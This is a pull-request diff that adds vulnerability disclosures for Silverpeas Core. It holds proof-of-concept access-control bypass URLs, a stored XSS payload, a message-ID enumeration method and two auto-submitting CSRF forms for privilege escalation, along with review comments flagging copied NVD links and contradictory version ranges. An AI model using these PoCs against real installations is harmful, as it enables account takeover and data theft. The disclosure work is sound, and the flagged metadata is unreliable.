Merge pull request #9 from TeneBrae93/master
Adding Silverpeas CVEs
Showing 10 changed files with 159 additions and 0 deletions.
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47320: Denial of Service via Broken Access Control in Silverpeas Core | ||
|
||
## Information | ||
**Description:** This allows denial-of-service by a low privileged user affecting the Silverpeas Core application. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control. An attacker with low privileges is able to execute the administrator-only function of putting the application in "Maintenance Mode" due to broken access control. This makes the application unavailable to all users. | ||
|
||
### Usage/Exploitation | ||
After logging in as a low privileged user, go to this URL http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ActivateMaintenance?allIntranet=1. This places the application in "Maintenance Mode" and makes it unavailable to all users. |
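Review bot: the `**Versions Affected:** < 6.3.1` line contradicts the Description, which says 6.3.1 itself is vulnerable; with Version Fixed at 6.3.2 it should read `<= 6.3.1` (or `< 6.3.2`). The same mismatch is copied into every CVE file in this commit. Two smaller points: the `<br>` used after the Versions lines is missing on the Researcher and Disclosure lines, so those three lines render as one run-on paragraph on GitHub, and the Disclosure Link points at the blog index rather than the specific post.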
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47321: Portlet Deployer Access via Broken Access Control in Silverpeas Core | ||
|
||
## Information | ||
**Description:** This allows low privileged users to access the Portlet Deployment tool. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
Silverpeas Core 6.3.1 is vulnerable to Incorrect Access Control via the "Portlet Deployet" which allows administrators to deploy .WAR portlets. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/portletDeployer. |
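Review bot: the NIST CVE Link still points at CVE-2023-47320 (copied from the previous file) although this file documents CVE-2023-47321; it should be https://nvd.nist.gov/vuln/detail/CVE-2023-47321. "Portlet Deployet" in the Description is a typo for "Portlet Deployer", and the Description stops at what the tool does without stating the impact of a low-privileged user reaching it, which the write-up should spell out so a reader can rate severity.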
@@ -0,0 +1,15 @@ | ||
<html> | ||
<body> | ||
<form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/userModify"> | ||
<input type="hidden" name="Iduser" value="[AttackersID]" /> | ||
<input type="hidden" name="userLastName" value="[AttackersLastName]" /> | ||
<input type="hidden" name="userAccessLevel" value="ADMINISTRATOR" /> | ||
<input type="hidden" name="X-STKN" value="[AttackersSTKNToken]" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
<script> | ||
history.pushState('', '', '/'); | ||
document.forms[0].submit(); | ||
</script> | ||
</body> | ||
</html> |
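Review bot: the form has no `method` attribute, so the browser submits it as a GET; the write-up should say whether `userModify` accepts GET, otherwise a reader verifying the fix cannot tell whether a POST-only endpoint would count as remediated. The file also carries no comment tying it to CVE-2023-47322 or explaining the `[AttackersID]`, `[AttackersLastName]` and `[AttackersSTKNToken]` placeholders; in particular the X-STKN value is the attacker's own token, which implies the token is not bound to the submitting session, and that is the detail worth stating explicitly in the markdown.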
@@ -0,0 +1,17 @@ | ||
# CVE-2023-47322: CSRF Leading to Privilege Escalation in Silverpeas Core | ||
|
||
## Information | ||
**Description:** The "userModify" request is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
The "userModify" feature of Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) leading to privilege escalation. If an administrator goes to a malicious URL while being authenticated to the Silverpeas application, the CSRF will execute making the attacker and administrator user in the application. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an attacker must host ```CVE-2023-47322.html``` on an attacker-controlled web server. When an authenticated administrator goes to the attacker's website, the CSRF will execute making the attacker an administrator. | ||
|
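Review bot: the Description reads "making the attacker and administrator user", which should be "making the attacker an administrator user". The NIST CVE Link still points at CVE-2023-47320 rather than CVE-2023-47322, and the inline file name uses triple backticks (```CVE-2023-47322.html```) where a single backtick pair is the markdown convention for inline code.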
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47323: Broken Access Control Allows Reading All Messages in Silverpeas Core | ||
|
||
## Information | ||
**Description:** The notification/messaging feature does not enforce access control on the ID parameter, allowing any user to read all messages (including admin-only messages). <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an attacker can use a script or Burp Suite Intruder to view all messages by attacking the ID parameter in this URL: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] - the messages begin at "1" and increase in intervals of 1. |
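Review bot: the NIST CVE Link points at CVE-2023-47320 instead of CVE-2023-47323. In the Description, "other users; including those" should use a comma, not a semicolon. It would also help defenders if the Description named the endpoint (`RSILVERMAIL/jsp/ReadMessage.jsp`) rather than leaving it to the Usage section, since that request pattern with sequential `ID` values is what to look for in access logs when checking for exploitation.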
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47324: Stored XSS in Messages affecting Silverpeas Core | ||
|
||
## Information | ||
**Description:** The messaging feature of Silverpeas Core is vulnerable to Stored Cross-Site Scripting (XSS). <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
The notification/messaging feature of Silverpeas Core 6.3.1 is vulnerable to Stored Cross-Site Scripting (XSS). | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, the following payload can be sent in a message to another user: ```<img/src/onerror=prompt(1)>```. When the user opens it, it successfully executes Javascript in the user's browser. |
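Review bot: the NIST CVE Link points at CVE-2023-47320 instead of CVE-2023-47324, and "Javascript" should be "JavaScript". The Description does not say which part of the message (subject or body) is stored and rendered without output encoding, nor whether the 6.3.2 fix encodes on output or filters on input; both matter to anyone verifying the patch and should be stated.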
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47325: Broken Access Control on the "Bin" Allows Modification of Deleted Spaces in Silverpeas Core | ||
|
||
## Information | ||
**Description:** Broken Access Control on the "Bin" allows low privileged users to access and modify deleted spaces in Silverpeas Core. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
The administrative "Bin" feature in Silverpeas Core 6.3.1 is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an authenticated user needs to navigate directly to this URL: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/ViewBin. The bin successfully renders revealing all deleted spaces. The low privileged user can then restore or permanently delete the spaces. |
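Review bot: the NIST CVE Link points at CVE-2023-47320 instead of CVE-2023-47325. The Description and Usage paragraphs repeat the same sentence ("restore or permanently delete the spaces"); the Description could be trimmed to the access-control statement and leave the steps to Usage. As in the other files, `< 6.3.1` in Versions Affected contradicts "6.3.1 is affected" in the Description.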
@@ -0,0 +1,15 @@ | ||
<html> | ||
<body> | ||
<form action="http://localhost:8080/silverpeas/RjobDomainPeas/jsp/domainSQLCreate"> | ||
<input type="hidden" name="domainName" value="Created-By-CSRF" /> | ||
<input type="hidden" name="domainDescription" value="" /> | ||
<input type="hidden" name="silverpeasServerURL" value="http://localhost:8080/silverpeas" /> | ||
<input type="hidden" name="X-STKN" value="[AttackerSTKNToken]" /> | ||
<input type="submit" value="Submit request" /> | ||
</form> | ||
<script> | ||
history.pushState('', '', '/'); | ||
document.forms[0].submit(); | ||
</script> | ||
</body> | ||
</html> |
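Review bot: the placeholder `[AttackerSTKNToken]` is spelled differently from `[AttackersSTKNToken]` in the userModify PoC; the two files should use one placeholder name. `silverpeasServerURL` is hard-coded to http://localhost:8080/silverpeas while the other values are placeholders, so it should either be bracketed (for example `[TargetURL]`) or documented as a value to change. As with the other HTML file, there is no `method` attribute (GET submission) and no comment naming the CVE it belongs to.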
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47326: Domain Creation is vulnerable to CSRF in Silverpeas Core | ||
|
||
## Information | ||
**Description:** Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
Silverpeas Core is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function. If an attacker clicks a malicious URL while authenticated to Silverpeas Core, the CSRF payload will create additional domains for authentication. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an attacker must direct an administrator to a URL that loads the ```CVE-2023-47326.html``` file. |
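Review bot: the Description says "If an attacker clicks a malicious URL while authenticated", but the Usage section correctly identifies the victim as an administrator; the Description should read "If an administrator clicks…". The NIST CVE Link points at CVE-2023-47320 instead of CVE-2023-47326, and the Description should state what an attacker-created authentication domain lets the attacker do, since that impact is what a reader needs to prioritise the fix.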
@@ -0,0 +1,16 @@ | ||
# CVE-2023-47327: The Space Create Function in Silverpeas Core is vulnerable to Broken Access Control | ||
|
||
## Information | ||
**Description:** The "create a space" feature in Silverpeas Core suffers from broken access control, allowing any user to create a space regardless of permissions. <br> | ||
**Versions Affected:** < 6.3.1 <br> | ||
**Version Fixed:** 6.3.2 <br> | ||
**Researcher:** Tyler Ramsbey (https://youtube.com/@TylerRamsbey) | ||
**Disclosure Link:** https://rhinosecuritylabs.com/blog/ | ||
**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2023-47320 | ||
|
||
## Proof-of-Concept Exploit | ||
### Description | ||
The "create a space" feature in Silverpeas Core is reserved for administrator use. This feature suffers from Broken Access Control, allowing any authenticated user to create a space by navigating directly to the correct URL. | ||
|
||
### Usage/Exploitation | ||
To exploit this vulnerability, an attacker with low privileges needs to navigate directly to this URL with their X-STKN token: http://localhost:8080/silverpeas/RjobStartPagePeas/jsp/CreateSpace?X-STKN=[Users-STKN-Token]. The attacker can then type in a name and description and click "Ok" and the space is successfully created. |
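Review bot: the NIST CVE Link points at CVE-2023-47320 instead of CVE-2023-47327. The Description says the feature "is reserved for administrator use" but gives no version, unlike the other files; it should name 6.3.1 so the affected range is consistent with Version Fixed 6.3.2. The `<br>` tags are again missing on the Researcher and Disclosure lines, so those lines render as one paragraph.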